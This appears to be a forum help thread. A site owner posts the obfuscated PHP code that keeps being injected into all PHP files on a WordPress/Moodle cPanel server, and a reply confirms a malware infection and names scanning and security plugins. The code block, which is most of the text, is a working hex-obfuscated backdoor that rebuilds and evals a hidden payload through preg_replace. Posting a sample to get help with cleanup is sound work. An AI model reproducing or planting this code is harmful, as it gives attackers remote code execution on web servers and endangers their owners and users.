# PHP code getting injected to my server automatically

Tags: php, wordpress, cpanel, code-injection

I am not a PHP programmer. The below code is getting added to all my PHP files on my server (cPanel based). I have WordPress, Moodle and a few PHP websites. Even if I manually clean up my server by removing this code from all my PHP files, this code is getting added again and again.

One of my friend said it is decoded. I cannot able to find the root cause for this problem. All WordPress files are running in latest version. One Moodle site is running in v2.6.

CODE:

```
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $iuzusrhtnn = '7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x]67y]562]38y]572]48y]#>m%x5c%x7825:|ojepdoF.uofuopD#)sfebfI{*w%x5c%x3P6L1M5]D2P4]D6#<%x5c%x7825c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%4tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-x5c%x7825!*72!%x5c%x7827!hmg%!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubEx7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)75c%x7825%x5c%x782fh%2)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uy782f#00#W~!%x5c%x7825t2w)#x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjud825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7824]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]2784#-!OVMM*<%x22%51%x29%51%x29%x7825>U<#16,47R57,27R66,#%x5c%x78782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zWt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>3]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L75983:48984:71]K9]77]D4]82]K6]72]<jg!)%x5c%x7825z>>2*!%x5c%xfw6*%x5c%x787f_*#fubfsdXk5%x5V<*w%x5c%x7825)ppde>u%x5c%xc%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cx5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x788e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z67825s:%x5c%x785c%x5c%x7825%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]825)}.;%x5c%x7860UQPM#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x78788pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+y111112)eobs%x5c%x7860un>273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j!|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x78x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfooWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x78x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{j825z!>2<!gps)%x5c%x7825j>1<%x5x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpm2f#00#W~!Ydrr)%x5c%x7825r782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x7fw6*%x5c%x787f_*#fmjgk4%x5c%x71]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%xx65","%x65%166%x61%154%x28:#*%x5c%x7824-%x5c%x7#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%xx5c%x7827&6<.fmjgA%x5c%x785c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*x5c%x7825)n%x5c%x7825-#+I#)q%x5c%7f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmSVD!-id%x5c%x7825)uqpuft%x5c%x7x7827rfs%x5c%x78256~6<%785cq%x5c%x7825%x5c%x7827Y%x5c%x78u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x78{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x78c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:I&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x78255c%x782f#p#%x5c%x782f%x5c%x7825zmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]278]y265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]25c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%56<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvre%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]25Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273c%x7860{66~6<&w6<%x5c%x787fw6*%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x782C#-#O#-#N#*%x5c%x7824%gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}c%x7825bss%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#7625c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7bE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%xrfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x4gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5cx75%156%x61"]=1; function fjfgg($n){return chr(or82f*)323zbe!-#jt0*?]+^?]_%qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x787x5c%x7824<!%x5c%x7825mm!>!#]y81]273]7825)fnbozcYufhA%x5c%x78272x5c%x7825hW~%x5c%x7825fdy)##-!#~<%5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmjiqj%x5c%x78256<*Y%x5c%x824!>!tus%x5c%x7860sfqc%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78bf#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFj:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7827825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bu3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-tr.984:2fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hc%x7825j=6[%x5c%x7825ww2!>#p#%xx7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x75!<5h%x5c%x7825%x5c%x782f#0%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#7827id%x5c%x78256<%x560FUPNFS&d_SFSFGFS%x5c%x7860QUU5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%%x7825h>#]y31]278]y3e]81]K78:56985:6197x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%d2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]6]61]y33]68]y34]68]y33]65]y31d($n)-1);} @error_reporting(0); preg_replace("%x2f%50%x2e%52%x29%57%:*mmvo:>:iuhofm%x5c%x7825:-5ppdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5cf#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7LS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%156%feobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%:=tj{fpg)%x5c%x7825s:*<%878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mn5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x742%x2c%163%x74%162%x5f%163%x70%154%x6973]83]238M7]381]211M5]67]452]88CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvx5c%x7825j:,,Bjg!)%x5c%x7825j:5j:^<!%x5c%x7825w%x5c%x7860%x%x7824-%x5c%x7824gps)%xde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{277]y72]265]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]y7%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x7ufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x5f%163%x74%141%x72%164") && (!isset($GLOBA25)}k~~~<ftmbg!osvufs!x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x|ftmf!~<**9.-j%x5c%x7825-bubE{h%xy76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]2:*r%x5c%x7825:-t%x5c%x7825)3of:e%x5c%x7825+*!*+fepdfe{h+{d%x5860{6~6<tfs%x5c%x7825w6<%;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x73]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y8fV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZAS2f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x782#Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x78ui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%ovg)!gj!|!*msv%x5c%x78fu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k9275j{hnpd19275fubmgoj{h1:|%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#fsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x78227827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x!|%x5c%x7824-%x5c%x782<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x782573", NULL); }g:74985-rr.93e:5597f-s.973:41]334]368]322]3]364]6]283]427]36]373P6]36]opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}472%qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x78if((function_exists("%x6f%142%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubG]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5cx5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#%x78256<*17-SFEBFI,6<*127-U860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7826;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[ojneb#-*f%x5c%x7825)sf%x57825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x727doj%x5c%x78256<%x5c%x785c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y7*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h127u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*VPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x78x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x782%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%50%x5c%x7825%x5c7pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-nd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%pdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%xx7824*!|!%x5c%x7824-61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7%x5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x2f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x78785)!>>%x5c%x7822!ftmbg)!gj<]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]245c%x785c^>Ew:Qb:Qc:W~!%x5c%x7]31#-%x5c%x7825tdz*Wsfuvso!%x5%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]2817825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<p25bss-%x5c%x7825r%x5c%x7878B%x5cc%x7824-!%x5c%x7825%x5c%x7824-%x5c%/(.*)/epreg_replacegnoifterpg'; $ghaybxccld = explode(chr((178-134)),'8173,31,6693,42,6004,52,4421,49,5805,68,2565,26,3740,46,9390,50,6268,38,9146,66,6607,44,1588,63,9999,40,9280,43,6757,43,4194,49,764,39,9212,68,7595,53,2919,52,8845,46,4295,65,952,64,2862,23,2084,53,9323,47,8204,34,7713,57,3647,63,4698,22,4598,27,8121,52,7289,68,3485,44,2612,53,2885,34,3965,48,1422,29,3710,30,6337,36,2665,26,8611,25,2470,31,7045,25,2332,51,5903,40,8329,27,8891,65,5376,21,413,69,3847,68,8481,58,7070,65,1734,21,2831,31,8356,64,5233,56,643,59,7478,22,6735,22,6845,33,5428,70,380,33,135,40,284,29,583,60,7135,55,7906,64,3274,41,313,67,2971,49,5022,62,4243,52,3443,42,5612,45,2246,56,1114,70,3786,39,5289,27,1755,40,5943,61,7770,64,5573,39,1896,24,4496,66,1858,38,6056,68,8289,40,8539,25,1478,70,5657,68,9006,36,5397,31,3129,49,2034,50,3577,70,502,55,7500,68,4920,38,2137,68,4857,63,4742,66,3079,50,8805,40,7568,27,5873,30,6494,51,7015,30,8420,61,9676,26,2205,41,2782,49,7247,42,1451,27,1184,45,919,33,5135,67,76,32,8564,47,6148,64,7419,59,5537,36,0,40,6212,56,4470,26,9042,52,3378,65,7190,57,2501,64,8636,56,803,39,6373,39,6651,42,2408,62,482,20,2749,33,9576,39,4659,39,9510,66,4013,65,40,36,6984,31,8053,68,4562,36,6878,45,1016,46,10071,35,9370,20,9094,52,175,43,5316,60,2591,21,4720,22,3210,64,2691,58,7834,22,4360,61,6471,23,4078,65,218,66,1677,57,8750,55,4143,51,1229,68,3020,59,2383,25,1795,63,1062,52,9440,70,702,62,557,26,7357,62,10039,32,5498,39,7983,27,3315,63,5084,51,1362,33,9888,64,842,47,1297,65,108,27,8238,51,8956,50,8692,58,4625,34,6923,61,8010,43,6306,31,9702,61,9792,30,3915,50,9615,61,7856,50,1990,44,6124,24,6412,30,6800,45,1651,26,4958,64,6442,29,9763,29,2302,30,5202,31,3178,32,1395,27,9952,47,4808,49,9822,66,7648,65,3825,22,1548,40,3529,48,1920,70,6545,62,5776,29,5725,51,889,30,7970,13'); $rjabvawxcw=substr($iuzusrhtnn,(39494-29388),(45-38)); if (!function_exists('ocjbuantmr')) { function ocjbuantmr($vhxrvcopkg, $niqvfjrqww) { $bcxhpyjdpu = NULL; for($rbinqwolsu=0;$rbinqwolsu<(sizeof($vhxrvcopkg)/2);$rbinqwolsu++) { $bcxhpyjdpu .= substr($niqvfjrqww, $vhxrvcopkg[($rbinqwolsu*2)],$vhxrvcopkg[($rbinqwolsu*2)+1]); } return $bcxhpyjdpu; };} $klzicgnjbm="\x20\57\x2a\40\x77\165\x6c\145\x64\143\x64\147\x72\150\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\66\x31\55\x31\62\x34\51\x29\54\x20\143\x68\162\x28\50\x34\66\x30\55\x33\66\x38\51\x29\54\x20\157\x63\152\x62\165\x61\156\x74\155\x72\50\x24\147\x68\141\x79\142\x78\143\x63\154\x64\54\x24\151\x75\172\x75\163\x72\150\x74\156\x6e\51\x29\51\x3b\40\x2f\52\x20\152\x64\156\x6b\170\x6f\166\x75\171\x6f\40\x2a\57\x20"; $lpvmnvqtdw=substr($iuzusrhtnn,(30503-20390),(53-41)); $lpvmnvqtdw($rjabvawxcw, $klzicgnjbm, NULL); $lpvmnvqtdw=$klzicgnjbm; $lpvmnvqtdw=(595-474); $iuzusrhtnn=$lpvmnvqtdw-1; ?>
```

Comment: https://codex.wordpress.org/FAQ_My_site_was_hacked

Comment: http://security.stackexchange.com/questions/70579/is-this-a-backdoor?newreg=bc5e05cb67784910b2c1b17ca0174ba2&newreg=4b61bbbc74e8476e8304b66173fc654a

Comment: as soon as i read the title, i knew wordpress was involved.

Answer (score 0):

Yes, Your site is infected with the malware. You can scan your site with https://sucuri.net/scanner , You need to remove all infected code from your all wordpress files and database.

Also I will suggest you install All In One WordPress Security and Sucuri Security plugins in your account to prevent this type if infections